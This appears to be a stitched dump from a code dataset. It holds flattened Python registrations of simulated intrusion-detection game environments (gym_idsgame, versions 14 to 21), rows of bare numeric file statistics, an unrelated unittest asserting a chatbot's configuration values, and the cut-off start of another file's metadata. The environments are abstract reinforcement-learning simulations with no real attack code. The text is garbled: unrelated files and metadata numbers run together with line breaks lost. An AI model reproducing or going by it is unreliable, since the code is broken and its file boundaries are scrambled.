[Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v14', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV14Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 14 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v14', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV14Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random attacker # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 14 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v14', entry_point='gym_idsgame.envs:IdsGameRandomAttackV14Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 14 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v14', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV14Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 14 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v14', entry_point='gym_idsgame.envs:IdsGameV14Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 15 ------------ # [AttackEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 15 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v15', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV15Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 15 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v15', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV15Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 15 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v15', entry_point='gym_idsgame.envs:IdsGameRandomAttackV15Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 15 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v15', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV15Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 15 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Start node # [Local View] Yes # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v15', entry_point='gym_idsgame.envs:IdsGameV15Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 16 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random defender # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 16 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v16', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV16Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 16 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v16', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV16Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random attacker # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 16 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v16', entry_point='gym_idsgame.envs:IdsGameRandomAttackV16Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 16 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v16', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV16Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 16 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v16', entry_point='gym_idsgame.envs:IdsGameV16Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 17 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random defender # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 17 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_defense-v17', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV17Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 4 attack-defense-values, defender following the "defend minimal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 17 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-minimal_defense-v17', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV17Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, random attacker # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 17 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-random_attack-v17', entry_point='gym_idsgame.envs:IdsGameRandomAttackV17Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values, attacker following the "attack maximal strategy" # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 17 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-maximal_attack-v17', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV17Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 4 attack-defense-values # [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 0 # [Rewards] Dense # [Version] 17 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] No # [Reconnaissance activities] disabled # [Reconnaissance bool features] No register( id='idsgame-v17', entry_point='gym_idsgame.envs:IdsGameV17Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 18 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 18 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_defense-v18', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV18Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 18 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-minimal_defense-v18', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV18Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 18 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_attack-v18', entry_point='gym_idsgame.envs:IdsGameRandomAttackV18Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 18 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-maximal_attack-v18', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV18Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 18 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-v18', entry_point='gym_idsgame.envs:IdsGameV18Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 19 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 19 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_defense-v19', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV19Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 19 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-minimal_defense-v19', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV19Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 19 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_attack-v19', entry_point='gym_idsgame.envs:IdsGameRandomAttackV19Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 19 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-maximal_attack-v19', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV19Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 19 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-v19', entry_point='gym_idsgame.envs:IdsGameV19Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 20 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 20 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_defense-v20', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV20Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 20 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-minimal_defense-v20', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV20Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 20 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_attack-v20', entry_point='gym_idsgame.envs:IdsGameRandomAttackV20Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 20 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-maximal_attack-v20', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV20Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 20 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-v20', entry_point='gym_idsgame.envs:IdsGameV20Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # -------- Version 21 ------------ # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 21 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_defense-v21', entry_point='gym_idsgame.envs:IdsGameRandomDefenseV21Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackerEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, defender following the "defend minimal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 21 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-minimal_defense-v21', entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV21Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, random attacker # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 21 # [Observations] fully observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-random_attack-v21', entry_point='gym_idsgame.envs:IdsGameRandomAttackV21Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [DefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender, attacker following the "attack maximal strategy" # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 21 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-maximal_attack-v21', entry_point='gym_idsgame.envs:IdsGameMaximalAttackV21Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} ) # [AttackDefenseEnv] 1 layer, 1 server per layer, 7 attack-defense-values, random defender # [Initial State] Defense: 7, Attack:0, Num vulnerabilities: 1, Det: 1, Vulnerability value: 1 # [Rewards] Dense # [Version] 21 # [Observations] partially observed # [Environment] Random # [Attacker Starting Position] Random # [Local View] Yes # [Reconnaissance activities] enabled # [Reconnaissance bool features] Yes register( id='idsgame-v21', entry_point='gym_idsgame.envs:IdsGameV21Env', kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None} )
38.157565
135
0.742341
8,091
67,081
6.061426
0.027932
0.054075
0.038476
0.045266
0.945232
0.944559
0.932121
0.884489
0.884489
0.884489
0
0.025794
0.133108
67,081
1,758
136
38.157565
0.817564
0.655521
0
0.399281
0
0
0.515517
0.302813
0
0
0
0
0
1
0
true
0
0.001799
0
0.001799
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
7
5a1e1c138ac4a3b33d13395c9235092e94bd7ca0
9,637
py
Python
test/programytest/config/file/base_file_tests.py
whackur/chatbot
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
[ "MIT" ]
2
2018-06-16T09:32:22.000Z
2019-07-21T13:16:00.000Z
test/programytest/config/file/base_file_tests.py
whackur/chatbot
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
[ "MIT" ]
3
2020-07-16T04:00:42.000Z
2021-03-31T18:52:22.000Z
test/programytest/config/file/base_file_tests.py
whackur/chatbot
bb4b4dace89f1f8aae2b6377bf7d2601e66af7a7
[ "MIT" ]
4
2018-06-29T23:50:44.000Z
2020-11-05T08:13:47.000Z
import unittest class ConfigurationBaseFileTests(unittest.TestCase): def assert_configuration(self, configuration): self.assertIsNotNone(configuration) self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0]) self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].overrides) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].overrides.allow_system_aiml) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].overrides.allow_learn_aiml) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].overrides.allow_learnf_aiml) self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].defaults) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.default_get, "test_unknown") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.default_property, "test_unknown") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.default_map, "test_unknown") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].defaults.learn_filename, "test-learnf.aiml") self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].nodes) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].nodes.pattern_nodes, "./config/test_pattern_nodes.conf") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].nodes.template_nodes, "./config/test_template_nodes.conf") self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].binaries) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].binaries.save_binary) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].binaries.load_binary) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].binaries.binary_filename, "/tmp/y-bot.brain") self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].binaries.load_aiml_on_binary_fail) self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].braintree) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].braintree.file, "/tmp/braintree.xml") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].braintree.content, "xml") self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files) self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.files, ["./test-aiml"]) self.assertIsNone(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.file) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.extension, ".test-aiml") self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.directories) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.errors.filename, "/tmp/y-bot_errors.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.duplicates.filename, "/tmp/y-bot_duplicates.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.conversation.filename, "/tmp/y-bot_conversation.txt") self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files.set_files) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.set_files.files, ["./test-sets"]) self.assertIsNone(configuration.client_configuration.configurations[0].configurations[0].files.set_files.file) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.set_files.extension, ".test-txt") self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].files.set_files.directories) self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files.map_files) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.map_files.files, ["./test-maps"]) self.assertIsNone(configuration.client_configuration.configurations[0].configurations[0].files.map_files.file) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.map_files.extension, ".test-txt") self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].files.map_files.directories) self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.denormal, "./config/test-denormal.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.normal, "./config/test-normal.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.gender, "./config/test-gender.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.person, "./config/test-person.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.person2, "./config/test-person2.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.properties, "./config/test-properties.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.triples, "./config/test-triples.txt") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.preprocessors, "./config/test-preprocessors.conf") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.postprocessors, "./config/test-postprocessors.conf") self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.regex_templates, "./config/regex-templates.txt") self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].services) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('REST')) rest_config =configuration.client_configuration.configurations[0].configurations[0].services.service('REST') self.assertEqual("programy.services.rest.GenericRESTService", rest_config.classname) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('Pannous')) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('Pandora')) self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('Wikipedia')) self.assertFalse(configuration.client_configuration.configurations[0].configurations[0].services.exists('Other')) self.assertIsNotNone(configuration.client_configuration.configurations) self.assertEqual(configuration.client_configuration.configurations[0].initial_question, "Hi, how can I help you test today?") self.assertEqual(configuration.client_configuration.configurations[0].default_response, "Sorry, I don't have a test answer for that!") self.assertEqual(configuration.client_configuration.configurations[0].empty_string, "TEST-YEMPTY") self.assertEqual(configuration.client_configuration.configurations[0].exit_response, "So long, and thanks for the test fish!") self.assertTrue(configuration.client_configuration.configurations[0].override_properties) self.assertEqual(configuration.client_configuration.configurations[0].max_question_recursion, 1000) self.assertEqual(configuration.client_configuration.configurations[0].max_question_timeout, 60) self.assertEqual(configuration.client_configuration.configurations[0].max_search_depth, 100) self.assertEqual(configuration.client_configuration.configurations[0].max_search_timeout, 60) self.assertIsNotNone(configuration.client_configuration.configurations[0].spelling) self.assertEqual(configuration.client_configuration.configurations[0].spelling.section_name, "spelling") self.assertEqual(configuration.client_configuration.configurations[0].spelling.classname, "programy.spelling.checker.TestSpellingChecker") self.assertEqual(configuration.client_configuration.configurations[0].spelling.corpus, "./spelling/test-corpus.txt") self.assertTrue(configuration.client_configuration.configurations[0].spelling.check_before) self.assertTrue(configuration.client_configuration.configurations[0].spelling.check_and_retry) self.assertIsNotNone(configuration.client_configuration) self.assertEqual(configuration.client_configuration.section_name, "console")
91.780952
166
0.803362
999
9,637
7.605606
0.129129
0.254672
0.315873
0.441958
0.836668
0.823769
0.815215
0.765859
0.7398
0.599105
0
0.016054
0.082183
9,637
104
167
92.663462
0.842962
0
0
0
0
0
0.087787
0.053855
0
0
0
0
0.9625
1
0.0125
false
0
0.0125
0
0.0375
0
0
0
0
null
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
9
5a40df2bbca7b2cdc9ab921c351855ab8dd69ce8
2,892
py
Python
open_source_mirror/ubuntu.py
fujiawei-dev/tookit-py
5ab3a18a41885f6166150cc27183621b96f8f991
[ "BSD-3-Clause" ]
null
null
null
open_source_mirror/ubuntu.py
fujiawei-dev/tookit-py
5ab3a18a41885f6166150cc27183621b96f8f991
